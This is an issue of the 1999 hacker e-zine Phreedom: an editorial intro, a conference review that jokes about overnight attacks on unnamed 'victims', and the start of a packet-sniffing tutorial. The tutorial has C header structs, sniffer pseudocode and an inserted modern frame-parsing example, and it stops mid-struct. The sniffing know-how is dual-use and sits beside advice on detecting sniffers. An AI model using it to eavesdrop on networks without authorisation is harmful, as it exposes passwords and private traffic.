Warning: This text file is to be used for educational purposes only !
        If you find any Anti-BTC, H/C/P/A/W materials to be offensive
                    STOP reading this text file right NOW!
       Phreedom shall not be liable for any direct or indirect damages
          caused by the use / misuse of the information below !
     This .txt file should be distributed unmodified and free of charge
      Reproduction of any part of the materials below should be done
            with the strict permission of the respective author











     issue:#21    |  ·  ·  ·  ·  ·  ·  ·  ·  ·  ·  |    21.12.1999::date
                  |                                |
                  |                                |
           ∙---\  \---\  /---∙  ∙---\  ∙---\   /---/  /---\  /---\
           ,___/      |  |       ,__/   ,__/   |      |   ∙  | ∙ |
           |          ∙  ∙       \---∙  \---∙  \---∙  \---   ∙ \-/
           |
           ∙           · ·· ···[ m a g a z i n e ] : since 1 9 9 7
    ·───────────────────────────────────────────────────────────────────·
             t e c h n i c a l : [h/c/p/a] : m a t e r i a l s
    ·-=====[ www.phreedom.org ]============[ phreedom.orbitel.bg ]=====-·
     +                             ■ T O C ■                           +
      : = | a r t i c l e | = - - - - - - - - - - = | a u t h o r | = :
     :    ·               ·                         ·             ·    :
      : ∙                                                           ∙ :
     :    openwide :: worldwide · · · · · · · · · · · · · · · · EXo    :
      :   Phreedom Con - review · · · · · · · · · · General Failure   :
     :    Aspects of Network Sniffing · · · · · · · · · · · · · Kay    :
      :   Windows NT Security · · · · · · · · · · · · Solar Eclipse   :
     :    Trojan Horse Hiding w/Linux · · · · · · · · · · ·IronCode    :
      :   Several Box Schemes · · · · · · · · · · · General Failure   :
     :    Collecting Information from Remote Sites· · · · ·  ManiaX    :
      :   Denial of Service Attacks · · · · · · · · · · · ·IronCode   :
     :    Phreaking RadioPhones and BigPhun · · · · · · · LudPhreak    :
      :   The Gentle Art of Trojan Horsing w/Windows· · · · · · EXo   :
     :    QoS & Adv.Routing for Linux · · · · · · ManiaX & Renegade    :
      :   Cracking Microangelo v2.1 · · · · · · · · · · · · · ·K.E.   :
     :    Increasing the Resistance of Phone Line · · ·Stoiko & 1/2    :
      :   X Window Tips & Tricks · · · · · · · · · · · Spite Master   :
     :    Cyber Anonymity Tutorial· · · · · · · · · · · MiCRoPhoBIC    :
      :   CC Phishing · · · · · · · · · · · · · · · · ·Star Gruhtar   :
     :    Phone Line Filters· · · · · · · · · · · · · · · · · Kuche    :
      :   Trojan Horse History· · · · · · · · · · · · Solar Eclipse   :
     :    Report on the meeting with KPD at NDK · · · · · · · · EXo    :
      :   Lie Detector· · · · · · · · · · · · · · · · ·Stoiko & 1/2   :
     :    Blue in the Dark· · · · · · · · · · · · · · · · · · Xoduz    :
      : ∙                                                           ∙ :
     :   ·                                                         ·   :
    ·-=====================[ staff@phreedom.org ]======================-·
       / '                                                         ' \
      \            [     ManiaX      ] :            founder           /
     / \           [       EXo       ] :    editor in chief          / \
    / · \          [  Solar Eclipse  ] :      second editor         / · /
     \_/ \         [ General Failure ] :  foreign relations        / \_/
    - | ∙ \        [    IronCode     ] : typographical fixer      / ∙ | -
       \  /\       [       kay       ] :           maillist      / \  /
        \/__\                                                   /___\/
             \//      feel free to get in touch anytime      \\/

 -·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·#00·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-
  [ a r t i c l e ]                                         [ a u t h o r ]
  openwide :: worldwide                                                 EXo
 -·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-

  Hh..h.h H.h.hHh.h..hHHHHHHHHHHhh.h..h.h.h.h.hhhh.hhhh..... . . . . . . .

  HH..HH.
  H .... . .... . . .h... .h ..h.h .h .h.hH.HH.H.H.h.h..hHHHHHHHHhhh HHH...
  H..

  H.h.H.Hh...h.h.h.HHHh
 .hhhhhhHHhHHHHhHHhHhHHHHHHHHHHHHHHHHHhHHHHHHHH H H H H Hi, there :) !!!!!
                                                        ^^^^^^^^^^^^
 Is anybody there?...

 And are we still here?

 And can one ever know...

 After such a global absence, what can you be sure of?

 PHM no longer exists?

 The guys from the staff have totally lost heart?

 Or is this just a publicity delay, meant to wind up the fans and get on
 everyone's nerves to the max ?

 Or is everyone so busy that Phreedom is no longer a priority...
 (the lazy bastards)?

 They made noise and more noise, and now what? Their thing went bust....

 Looks like a Viagra each is in order...

     Actually, I prefer RedBull (ManiaX will surely stand up for Beer), and
 although I have none at hand right now, I can guarantee you that I am
 writing this with a euphoria like the one the above-mentioned drink gives
 me. It is truly wonderful that you are reading the new Phreedom, and
 although the plan for the intro included a point in which I am supposed to
 make excuses for the delay, I have no intention whatsoever of apologizing -
 neither on my own behalf nor on behalf of the others. You may think it
 proper for me to throw in a few slick epithets and dramatize, but that
 would hardly be of use to anyone. The people close to the magazine know
 that delays are never accidental.

 .......Newz / Big NEWZ.....

     It is traditional in this damned intro for me to list in a heap the
 things that have happened between two issues and have something to do with
 Phreedom, but this time I will start straight off with the BIG NEWS, namely
 that the magazine will from now on also come out in ENGLISH. To the
 question of whether we are trying to pass for Phrack, we can categorically
 answer NO! The reason we lost almost 3 months translating 500k of material
 into English is that, to a greater or lesser extent, we are interested in
 the international audience's opinion of our original work. Besides, we
 think that little by little we are reaching the level of a satisfactory
 read which, although still far too distant from our idea of a perfect
 security related publication, would be of interest to a certain group of
 people deprived of the gift of understanding Bulgarian.

     Attracting foreign authors is not to be underestimated either. After
 all, if we keep publishing Phreedom only in Bulgarian, we automatically cut
 off our own visa to the outside world, and with it the way forward. The
 world has to learn that even here in our village there is someone or other
 who knows a thing or two. But in this intro too I will spare myself most of
 the superlatives you might expect to read about the Phreedom smart alecks
 (blah..). One thing is certain, though - right now we are in a period of
 major growth, and only time will tell whether we manage to break through
 the roof of the shack we live in.

 .......Respect.....

 In this spirit we would like to express our gratitude to ORBITEL, who alone
 among the whole bunch of bg ISPs have the courage to say "no" to all the
 swinishness and puritanism in this country. The guys gave us the
 opportunity to set up a mirror on their server, and it was the most
 expeditious arrangement and hosting set-up on a Bulgarian server that I
 know of. For those who still cannot figure out what kind of people the
 ORBITEL guys are - www.hit.bg will help you form an opinion. And don't
 forget: phreedom.orbitel.bg

 .......Site.....

     The site itself fell victim to a major overhaul, mostly the work of
 Solar. An enviable amount of DHTML has been crammed in, and browsing with
 lynx is many times better. The links system is now based on a Perl script,
 so updates will happen far more often and more easily. I warmly recommend
 that you visit the links section, since quite a few interesting new
 addresses have been added.

     I redrew some of the pictures, but much as we wanted to switch to the
 PNG format, we will wait at least until next year, when we hope most
 browsers will support the revolutionary format for lossless image
 compression.

     You can now read the magazine online in HTML format, and although we
 did not bother to decorate it with pictures, it will be more convenient for
 you to access the cited links and to fly around the articles via
 hyperlinks.


 .......Conference.....

     The other big event, which became one of the most discussed topics in
 the late hours of the summer days, was the event code-named Phreedom
 Con'99.

 [ Brief  History ]: In 1998 a gathering of the people directly or
 indirectly connected with Phreedom was held in Dobrich. That gathering had
 no practical result, but the idea of creating an annual conference
 remained.

     For a long time it was not clear where exactly the con would be held,
 and in practice this was decided at the last moment. A brutal argument also
 flared up over who should attend and who should not, and in the end it was
 decided to invite only people...:

     1)  Whom we know well enough, whom we like and whom we can trust
     (MANDATORY);

     2)  Anyone able to present a topic interesting to the rest or to supply
     1 crate of beer - the participation fee ;))).

     If you think you should have attended but were not invited, then
 evidently at that moment (summer '99) you were badly mistaken. After all,
 do not forget that this is Phreedom Con'99, and not a "Putki-majni" fair at
 the Town Pub or a Metropolis party where a dozen Metropolis types pour in.

    Persons who were...."approved":

     Dungeon  Keeper  (our host), EXo, Fubar, General Failure, IronCode,
 Kay,  ManiaX,  Ramirez  a.k.a  Lud Phreak, Spite Master, Solar Eclipse, Star
 Gruhtar, Metalista.

     Real Ender, Predator and KoRn were also invited but, alas, for valid
 reasons they could not attend. I personally am especially sorry about
 KoRn....

 [ int main() ]:  You will find more information on exactly how the party
 went in the article below.

 [ Returned  value ]:  PHM  21?  Yes...  A large part of this issue consists
 of text versions of the papers presented by the maniacs who attended the
 Con.

     The idea of a WinterCon '99 is being considered, since all participants
 were satisfied with Phreedom Con'99.

 .......Bitter story/Reality bites.....

     But it cannot be only good things happening....

     Unfortunately some people still cannot understand what Phreedom is and
 how relationships work here among us. I do not enjoy saying it, but after
 the release of PHM20 there were many negative reactions to TOKATA's
 articles in the issue. More than 20 readers sent letters vehemently
 protesting against the tone of his articles. It got to the point where a
 post appeared on the magazine's message board unambiguously accusing us of
 having become a victim of outside pressure. Few people know that even for
 the publications in question in PHM20 there was a big argument about
 whether it was proper to run them in their full version. In practice there
 is nothing of the kind. We all think Tokata has something to say but, alas,
 does not know how to say it.

     We tried to approach the problem diplomatically, but the result was
 exactly the opposite of what we expected - the gentleman decided that he
 should be the one to determine which article gets published and which does
 not. Soon after, following several not quite gentlemanly statements by
 Tokata over the next few weeks, it was unanimously decided that breaking
 off all contact between us would be in both his interest and ours. His
 articles will no longer appear in Phreedom magazine, and our position is
 demonstrated most precisely as follows:

   *** 16:08 TOKATA_lv (xbg@lovetch74.pip.digsys.bg) has joined channel #phm
   *** Mode change "+b *!*@lovetch*.pip.digsys.bg" on channel #phm by DAVID
   *** Mode change "+b *!*@*love*.pip.digsys.bg" on channel #phm by DAVID
   *** Mode change "+b *!*@*lovetch*.digsys.bg" on channel #phm by DAVID
   *** Mode change "+b TOKATA*!*@*.*" on channel #phm by DAVID
   *** TOKATA_lv has been kicked off channel #phm by DAVID (banned: request)

        WE OFFICIALLY APOLOGIZE TO ALL READERS WHO FELT AFFECTED BY
                              THIS CONFLICT.

 .......Messaging.....

     And where can you curse us out if we have really made your blood boil?
 Of course, the best place is the Phreedom msg.board, which is open to all
 your comments, suggestions, ideas, criticism, swearing and the like, or in
 other words - everything you think should be public knowledge. In practice
 the board has been a fact since mid-June, but after about a month of
 operation it went and crashed very badly, and only on September 15th did it
 get around to working again. Its original idea has developed a great deal
 and we are now enjoying v3.0, which has plenty to boast about. This is not
 the place for that, so -

                          http://mboard.phreedom.org

                                      or

                      http://phreedom.orbitel.bg/mboard/

 We will be glad to hear a "hoya" from each of you.... :)

 [Special  10x  to  maav  for the support during some of my earlier attempts
  to compile this board]

 .......License.....

     THERE WILL BE NO LICENSES!!! Whoever has not yet heard the news is
 evidently deaf, blind and clueless on top of it all (and his feet stink
 too).

     Respect  to:  Veni Markovski. Whatever anyone says - the guy did a lot
 to prevent the licensing. Various rumours appeared that BTC was going to
 become a monopoly I'net provider, rumours that had their basis, but
 fortunately they were refuted. In reality the OTE group has put forward a
 demand for monopoly status as a condition for purchasing BTC, but it would
 be far too brazen of the government to give in to such a whim. But let them
 try to push such a law through - then they will see what it is like for
 people to storm the parliament building with pitchforks and clubs. In an
 article below you can also read a short report on the open meeting with the
 KPD and the DKD at the NDK, held before the licenses were cancelled.

     Alas, there is bad news too - from the new year, billing at all
 exchanges, be they digital or step-by-step, will be done under the
 time-based billing system. This is a cunning move by the BTK people, who
 know that sooner or later they have to get rid of those step-by-step
 exchanges. And at some point, when it turns out that people with "digital"
 phones get a better-quality service than those with "analogue" ones at one
 and the same price (however wrong that naming may be, since the channel is
 analogue in both cases), everyone will rush to UPGRADE their phones. That
 way BTC will recoup its losses from purchasing equipment. I would say - a
 scheme of hyenas and sharks.

 .......Curious.....

     About a month ago a mail arrived from the company ACVILON with the
 suspicious subject: ANTI_BTC. The content was the following:

     DSM  Comunications  is a company for the development and production of
     communication devices.
     It offers modems for 4-wire lines - short range modems 2-6km /like
     Patton , RAD/ but at Bulgarian prices.
     We produce radio modems at 1.3GHz, 11GHZ /SAT modems- microwave/
     for PPP links over RS232 115kbps or 230kbps.
     Now also at 115KBPS - no need for BTK !!

     The message speaks for itself. For more info visit:

          www.dsm.rousse.bitex.com

     Note: This is not a paid advertisement or anything of the kind ! Don't
     get any ideas..

 .......Staff-response.....

     The BG version of PHM#21 was edited and laid out by IronCode.
 Personally I do not like at all that new paragraphs do not start with a
 4-character indent. Unfortunately, though, I noticed this fact too late. If
 you have something to say on the matter - the mboard awaits you.

     And finally we want to thank everyone who wrote to us or expressed
 their opinion about the magazine, including those who cursed us and kept
 urging us to get the damned PHM#21 out. 10X, guyz, we really appreciate
 it ! (aww, granny's little sweeties...)

 >> EOA <<

 -·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·#01·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-
  [ a r t i c l e ]                                         [ a u t h o r ]
  Phreedom Con - Review                                     General Failure
 -·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-

                 |  ·  ·  ·  ·  ·  ·  ·  ·  ·  ·  |    ascii: EXo
                 |                                |
                 |                                |
          ·---\  \---\  /---·  ·---\  ·---\   /---/  /---\  /---\
          ,___/      |  |       ,__/   ,__/   |      |   ·  | · |
          |          ·  ·       \---·  \---·  \---·  \---   · \-/
          |
          ·             · ·· ···[ C O N f e r e n c e ] : 1 9 9 9
                                                j u l y / 28 - 31
                                       d o w n t o w n: s o f i a


               Final score after the 2nd half of the match:

                           PHREEDOM  -  BTC     1:0



                        event photographer  :  Star Gruhtar
           pictures can be downloaded at  :  www.eventoftheyear.com



     I. A SHORT FOREWORD

 What was this CON, basically? On the whole, the chance to get together in
 one place, to talk, to exchange information (to have a drink:) looked quite
 tempting in itself. People agreed (naturally, it could not go without a few
 conflicts, which were reflected on the Phreedom message board, but that is
 normal). So the idea was to get together, for everyone to pick a topic and
 introduce the others to it as he saw fit - as theory, as a practical
 application or demonstration, or both together!

 To outsiders the CON looked like a gathering of a pack of young people who
 were simply hanging out (running wild:) in an empty apartment. The
 atmosphere, however, was actually great. It rarely happens that only
 friends have gathered in one place and that, on top of that, you share
 interests with all of them.


     II. PREPARING FOR THE CON

 We cannot fail to mention the 3 heroic hours spent cleaning the apartment,
 which after intensive work took on its tidiest look in quite a while. The
 place became known barely 2-3 days before the event, and we were somewhat
 at a loss when it turned out that preparing a place for the temporary
 cohabitation of a dozen cattle is no joke at all.

     III. THE PLACE

 The place, as you already know, was Sofia. A fairly good apartment with a
 good bathroom (Ed. note: I would say... satisfactory), at a more or less
 decent distance from the centre of the city (Iron's note - f... well...
 and the centre too;-). Our host was Dungeon Keeper. The apartment had a
 very cool, anti-cop locking mechanism (well, its purpose was probably not
 cops, but that is how I interpreted it:) As you will find out below, we
 also had a second apartment, but since that was EXo's humble abode, I will
 not write about it for security reasons. Still, if any BTC or police
 employee is interested, let him write to me and I will send him the exact
 address and phone number - everything in service of the state :-)

     IV. PHREEDOM CON BEGINS

 People arrived, as is tradition, at different hours - from early morning
 until evening. The order of arrival was more or less the following:

    ManiaX, Fubar, kay + General Failure, RamireZ, METALISTA, Spite Master

 Much of this day was devoted to setting up the LAN (4 PC's), setting up the
 drinks - batch 1, testing the LAN (Star Gruhtar was flooding away with
 gusto :). The day ended with THE MATRIX - and since there always had to be
 some snag - only 1/2 of the film; the other 1/2 simply refused to start
 (Author's note: EXo, may lightning strike you!!*$^%@&)

     DAY2

 Until noon the folks occupied themselves with all sorts of things, mostly
 nonsense, due to the lack of food. Around 2 pm the food arrived in
 industrial quantities (enough even for an entire department of BTC
 people:)) along with drinks - batch 2.
 [EXo]:  I could write a whole epic here about how we managed to spend 170
 thousand in less than 2 hours at the Metro, and on food and drink alone. We
 barely fitted it all into the car, and when we unloaded the groceries into
 the fridge, Dungeon Keeper could not tell whether this was his own fridge
 or some advertising idyll.


     V. THE CON ITSELF

 After a solid upload, around 4 pm the CON proper began. For that day it
 ended around 1-2 am, but then continued with practical demonstrations. Here
 the author surrenders to sleep around 3 am.

     DAY3

 Wake-up shortly before noon. RamireZ had to leave:((((((, but then Spite
 Master arrived:)))) At some point BTC decided to put their signature on the
 event too and cut off the phone. A CON without a phone:)))) The only thing
 we could think of was to call a technician, but that way there would 100%
 have been mortal kombat:) Luckily another, non-technical reason to move
 also came up, and we felt the need for a new host. A short refreshment
 followed. EXo signed up as volunteer for new host (there simply was no
 other) and the great transportation began - crates, food, drink, livestock,
 etc.

 We arrived, setting up the LAN (now 3 PC's), a brief look around the
 surroundings, and we decided that the CON must go on. It ran well, and with
 long interruptions and with half of us still awake it ended around 4 am.
 Then, naturally, those still awake did not head off to sleep; instead came
 the rather interesting part - a little playing around with ******* and
 ****** (I probably should not write the victims' names here:) Even some of
 the sleepers woke up.
 [EXo]:  I want to express my deep disappointment at the alcoholic abilities
 of ManiaX, who is supposedly famed as a first-class alcoholic. The others
 also acted like grannies, and I have the feeling that my only company in a
 proper binge was Metalista. Still, there was some nice Rum.

 This went on until around 10 am, when the connection began to drop
 unbearably (due to the awakening of many Sofia chatters, perhaps:). The
 people who were going to travel went off to sort out their details, and
 after that the restoring of the premises to a fitting state began. Around
 1 pm the author left the scene of the event asleep, content and ready for
 next year.

     VI. SPEAKING ORDER

 Here I will only set out the order in which people spoke at the CON. I will
 not list the topics, because they are further down in the issue itself.

     1. EXo - welcome & intro
     2. ManiaX
     3. kay
     4. RamireZ
     5. IronCode
     6. General Failure
     7. Solar Eclipse
     8. Star Gruhtar
     9. EXo

     VII. THINGS WE LEARNED AT SUMMER CON'99 (& some results)

     - Star Gruhtar's favourite pastime was to "hack meNTeta"
     - General Failure never did manage to show people a little
       (4hrs:) of LoveParade'99
     - EXo and General Failure are pretty good cooks. [EXo]: I am still
       full from those kebapcheta.
     - messing around with mobile phones is illegal, but also quite fun:-)
     - do not try to take a bath in Dungeon Keeper's bathroom!!
     - this year ManiaX gave no reason to have his nick changed to
       Alcohollian, as he did last year
     - Bulgarian State Railways SUXXXXXX
     - I think the sleeping record was set by Solar Eclipse
     - as for the drinking record - I don't know ?!?!?!?!??
     - the scan of the Sofia frequencies yielded excellent results
     - 12 head of livestock can have dinner at a table for 6

 P.S. Well, that is as much as I can recover of the events in Sofia. I hope
      you have got some (even if minimal) idea of 'the CON itself'.

     PEACE ALL.

 >> EOA <<

 -·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·#02·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-
  [ a r t i c l e ]                                         [ a u t h o r ]
  Aspects of Network Sniffing                                           kay
 -·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-

                    Copyright 1999 kay <kay@phreedom.org>
         Please contact the author and/or Phreedom Magazine prior to
                           publication of any kind.

 0. Abstract

 This article aims to show both sides of network sniffers - what they mean
 for system administrators: how to detect them, how to stop them; and what
 they mean for the programmer. Examples are included for Linux-specific
 functions as well as for the PCAP library.

 Contents:

   1. Network basics
     1.1. Network design, hardware and software
     1.2. Devices and interfaces
     1.3. Preventing and detecting sniffers
   2. Introduction to packet sniffing
     2.1. Example of Linux SOCK_PACKET usage
     2.2. Libpcap example
     2.3. BPF Packet filter programs
     2.4. Loadable kernel modules
   3. Bibliography and additional files


 1. Network basics

 Some people would object that sniffers are a rather worn-out subject: yes,
 they are. Since we have asymmetric encryption algorithms at our disposal,
 these problems are supposed to be solved. In reality, every day thousands
 of accounts, credit cards and other important information "leak". Sniffers
 are also always a useful tool for diagnosing problems in network protocols,
 as well as for security monitoring (IDS, Intrusion Detection Systems).


 1.1. Network design, hardware and software

 Certain features of the construction and design of local area networks
 allow the communication between 2 stations to be "eavesdropped on" by third
 computers connected to the same segment. This is due to a feature of the
 IEEE 802.3 CSMA/CD (Carrier Sense Multiple Access with Collision Detection)
 standard, and more specifically of the transmission algorithm used by NIC's
 (Network Interface Cards) to avoid collisions. A collision occurs when 2
 stations try to transmit data on the network simultaneously. Since all of
 them use one and the same frequency band, this leads to a temporary halt of
 all communication. It is precisely this algorithm in the adapters that
 monitors the traffic on the network and waits for the most convenient
 moment "to cut in". Some older models of network devices also "listen" to
 all packets passing through the network in order to react to Broadcast
 messages.

 This is still not enough for all connections to be eavesdropped on: the
 operating system of each station takes only the packets destined for it and
 skips the rest. The exception is Broadcast packets, whose existence is
 possible only within one segment of a local network (rarely in other cases
 too) precisely because of these features. A Broadcast is sent to a specific
 network address to which all stations respond. This is used for locating
 DHCP and BOOTP servers and other similar services (Smurf ...).


 1.2. Devices and interfaces

 In Unix the individual physical and logical network devices are represented
 by so-called interfaces. They can be listed with the 'ifconfig' command (on
 newer Linux systems also with 'ip'):


 $ /sbin/ifconfig -a
 lo        Link encap:Local Loopback
           inet addr:127.0.0.1  Mask:255.0.0.0
           UP LOOPBACK RUNNING  MTU:3924  Metric:1
           RX packets:249 errors:0 dropped:0 overruns:0 frame:0
           TX packets:249 errors:0 dropped:0 overruns:0 carrier:0
           Collisions:0

 eth0      Link encap:Ethernet  HWaddr 00:AC:3B:71:1D:D0
           inet addr:192.168.0.1  Mask:255.255.255.0
           MULTICAST PROMISC  MTU:1500  Metric:1
           RX packets:5357 errors:0 dropped:0 overruns:0 frame:0
           TX packets:2397 errors:0 dropped:0 overruns:0 carrier:0
           Collisions:0
           Interrupt:12 Base address:0x420

 ppp0      Link encap:Point-to-Point Protocol
           inet addr:192.168.0.100  P-t-P:192.168.1.1  Mask:255.255.255.255
           POINTOPOINT NOARP MULTICAST  MTU:1500  Metric:1
           RX packets:913 errors:1 dropped:0 overruns:0 frame:1
           TX packets:920 errors:0 dropped:0 overruns:0 carrier:0
           Collisions:0

 In this case - a Linux system with a loopback, one Ethernet and one PPP
 interface. You can see that the eth0 interface is in promiscuous mode, i.e.
 it receives all packets from the network, even those not specifically
 addressed to this host. Further down you will see how you can write such a
 program of your own.


 1.3. How to prevent sniffers on the local network

 There are hardware and software solutions that make the whole network more
 secure. Proper design and construction of the network topology is a
 prerequisite for isolating the individual network segments. The use of
 switches, encrypting hubs and routers, and VPNs greatly reduces the chance
 of "secure" connections being eavesdropped on.

 L0pht Heavy Industries announced a software product for NT and Unix that
 detects sniffers on a local network (or, in general, network adapters in
 promiscuous mode); it works on the basis of passive indicators and provokes
 the sniffer into giving itself away by means of spoofed packets. On BugTraq
 there is an interesting discussion on the effectiveness of AntiSniff, as
 well as a GPL AntiAntiSniff Sniffer. When you check your local system for
 interfaces in promiscuous mode, it is advisable to use a separate program
 rather than ifconfig, because ifconfig may have been trojaned so that it
 does not show the flag. See lspromisc.c further below.

 Here is an example of a badly built local network:

           [Server]
              |
  [Bridge]--[Hub]---[Border router]------------  - - - Internet
              |
              |
         [Another Hub]
         / | | | | | \
        .  . . . . .  .

 This way all stations will be able to eavesdrop on the traffic between our
 server and the neighbouring one, or on Joe's e-mail password on another
 server on the Internet. Switches should be used instead of hubs, the
 machines should be divided into groups and, where possible, separated into
 VLANs, and so on and so forth. Remember that the most secure computers are
 the ones that are switched off. But let us leave this for now, since this
 article has a different main topic.


 2. Introduction to Libpcap

 Every operating system provides its own method of accessing the lowest
 level of the network: the Berkeley Packet Filter on BSD, a char device on
 Solaris, a special socket type on Linux, and so on. This makes it hard to
 write portable programs that use these functions and compile unchanged on
 different flavours of Unix. The PCAP library (from Packet Capture) is in
 fact a common interface to the corresponding low-level functions of a given
 operating system, and it offers the programmer many additional useful
 features, such as dumping packets to a file, reading from a file, BPF
 filters and rules for receiving only particular packets, and information
 about the network/host. That is why, if you look at any archive of public
 exploits, you will find several different sniffers, each working only on a
 particular operating system.

 A few words on building the sniffer itself. It is unthinkable to write a
 packet sniffer without knowing well enough the protocols and packets we may
 run into. Since the main purpose of most sniffers is eavesdropping on TCP
 connections on a local network, one has to start from the Ethernet frame,
 go through IPv4 (or v6, but for now that is not all that necessary) and on
 to the TCP header itself. Since we do not receive the data as a stream but
 split into separate packets, we have to put together something like a
 mini TCP/IP stack in order to follow the individual logical TCP sessions
 (in the kernel this job is done by the TCP multiplexer).

  struct ethhdr eth;
  struct iphdr ip;
  struct tcphdr tcp;
  [... data ...]

 Of course, we can also eavesdrop on ICMP, IGMP, UDP and anything else that
 can be carried over IPv4, as long as we can correctly recognize the
 protocol.

 #define MAC_LEN 6

 struct ethhdr {
         u_char dst_addr[MAC_LEN];
         u_char src_addr[MAC_LEN];
         u_short protocol;
 };

 struct iphdr {
         u_char ver_ihl;
         u_char tos;
         u_short total_len;
         u_short id;
         u_short frag_offset;
         u_char ttl;
         u_char protocol;
         u_short checksum;
         u_int32_t src_addr;     /* exactly 32 bits; u_long is 64 on LP64 */
         u_int32_t dst_addr;
 };

 struct tcphdr {
         u_short src_port;
         u_short dst_port;
         u_int32_t sequence;
         u_int32_t acq_seq;
         u_short flags;          /* data offset, reserved bits and flags */
         u_short window;
         u_short checksum;
         u_short urg_ptr;
 };


 This is the approximate scheme of operation (algorithm) of the sniffer in
 pseudocode (I hate flowcharts):

 while (we_want_to_sniff) {
         packet = read_raw_packet();

         if (starts_new_connection(packet) && port_is_interesting(packet))
                 add_to_stack(connection(packet));

         if (packet_is_part_of_tracked_connection(packet)) {
                 log(packet);

                 if (we_have_logged_enough(connection(packet)) ||
                     packet_closes_connection(packet))
                         remove_from_stack(connection(packet));
         }
 }
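
 Added example (not part of the original article): the header layering and
 the pseudocode above both depend on locating each header correctly. This C
 sketch parses one Ethernet/IPv4/TCP frame with every length checked and
 supplies the starts_new_connection() and packet_closes_connection() tests;
 struct tcp_segment, parse_tcp_frame(), parse_patched() and the sample frame
 are names and data constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ETH_HDR_LEN 14
#define TH_FIN 0x01
#define TH_SYN 0x02
#define TH_RST 0x04
#define TH_ACK 0x10

struct tcp_segment {                     /* hypothetical result type */
        uint32_t src_addr, dst_addr;     /* host byte order */
        uint16_t src_port, dst_port;
        uint32_t seq;
        uint8_t flags;
        size_t payload_off, payload_len; /* offset from start of frame */
};

/* Constructed sample: TCP SYN 192.0.2.1:49152 -> 192.0.2.2:80, seq 1000 */
static const uint8_t sample_syn[54] = {
        0x02,0,0,0,0,0x01, 0x02,0,0,0,0,0x02, 0x08,0x00,       /* Ethernet */
        0x45,0x00,0x00,0x28, 0x00,0x01,0x40,0x00,              /* IPv4 */
        0x40,0x06,0x00,0x00, 0xc0,0x00,0x02,0x01, 0xc0,0x00,0x02,0x02,
        0xc0,0x00,0x00,0x50, 0x00,0x00,0x03,0xe8, 0,0,0,0,     /* TCP */
        0x50,0x02,0x20,0x00, 0,0,0,0
};

/* Read big-endian fields byte by byte: no alignment or endianness traps */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t rd32(const uint8_t *p)
{
        return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
               ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Returns 0 on success, or a negative code naming the check that failed */
int parse_tcp_frame(const uint8_t *f, size_t caplen, struct tcp_segment *out)
{
        size_t left, ihl, total, seg, doff;
        const uint8_t *ip, *tcp;

        if (caplen < ETH_HDR_LEN) return -1;         /* no Ethernet header */
        if (rd16(f + 12) != 0x0800) return -2;       /* not IPv4 */
        ip = f + ETH_HDR_LEN;
        left = caplen - ETH_HDR_LEN;
        if (left < 20 || (ip[0] >> 4) != 4) return -3;
        ihl = (size_t)(ip[0] & 0x0f) * 4;            /* header may carry options */
        if (ihl < 20 || ihl > left) return -4;
        total = rd16(ip + 2);                        /* excludes Ethernet padding */
        if (total < ihl || total > left) return -5;  /* truncated capture */
        if (rd16(ip + 6) & 0x3fff) return -6;        /* fragment: no full TCP header */
        if (ip[9] != 6) return -7;                   /* not TCP */
        tcp = ip + ihl;
        seg = total - ihl;
        if (seg < 20) return -8;
        doff = (size_t)(tcp[12] >> 4) * 4;           /* TCP header length */
        if (doff < 20 || doff > seg) return -9;

        out->src_addr = rd32(ip + 12);
        out->dst_addr = rd32(ip + 16);
        out->src_port = rd16(tcp);
        out->dst_port = rd16(tcp + 2);
        out->seq = rd32(tcp + 4);
        out->flags = tcp[13];
        out->payload_off = ETH_HDR_LEN + ihl + doff;
        out->payload_len = seg - doff;
        return 0;
}

/* The two predicates the pseudocode relies on */
int starts_new_connection(const struct tcp_segment *s)
{
        return (s->flags & TH_SYN) && !(s->flags & TH_ACK);
}

int packet_closes_connection(const struct tcp_segment *s)
{
        return (s->flags & (TH_FIN | TH_RST)) != 0;
}

/* Parse a copy of the sample with one octet overwritten (malformed input) */
int parse_patched(size_t off, uint8_t val, size_t caplen, struct tcp_segment *out)
{
        uint8_t copy[sizeof(sample_syn)];

        memcpy(copy, sample_syn, sizeof(copy));
        if (off < sizeof(copy))
                copy[off] = val;
        return parse_tcp_frame(copy, caplen, out);
}

int main(void)
{
        struct tcp_segment s;
        int rc = parse_tcp_frame(sample_syn, sizeof(sample_syn), &s);

        printf("full frame: rc=%d port %u -> %u syn=%d\n", rc,
               (unsigned)s.src_port, (unsigned)s.dst_port, starts_new_connection(&s));
        printf("40 octets captured: rc=%d\n", parse_tcp_frame(sample_syn, 40, &s));
        printf("IHL patched to 4:   rc=%d\n", parse_patched(14, 0x44, 54, &s));
        return 0;
}
```

 The rejected cases are the ones a fixed "+14, +20" offset would read past:
 short captures, an IHL or data offset that lies, and non-first fragments.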


 2.1. Example of Linux SOCK_PACKET usage

 For access to the link layer of a given interface Linux provides a special
 socket type, SOCK_PACKET, with which we can receive/send not just IPv4 plus
 a frame, but build the packet starting from Ethernet, PPP, SLIP or whatever
 other protocol is used for the link on that interface (i.e. from the Link
 Layer).

 To receive all the packets that interest us (including those that are not
 addressed to us), the interface must have the promiscuous flag
 (IFF_PROMISC) raised. On Linux this is done through the ifreq structure:

 struct ifreq
 {
 #define IFNAMSIZ        16
         union
         {
                 char    ifrn_name[IFNAMSIZ];
         } ifr_ifrn;

         union {
                 struct  sockaddr ifru_addr;
                 struct  sockaddr ifru_dstaddr;
                 struct  sockaddr ifru_broadaddr;
                 struct  sockaddr ifru_netmask;
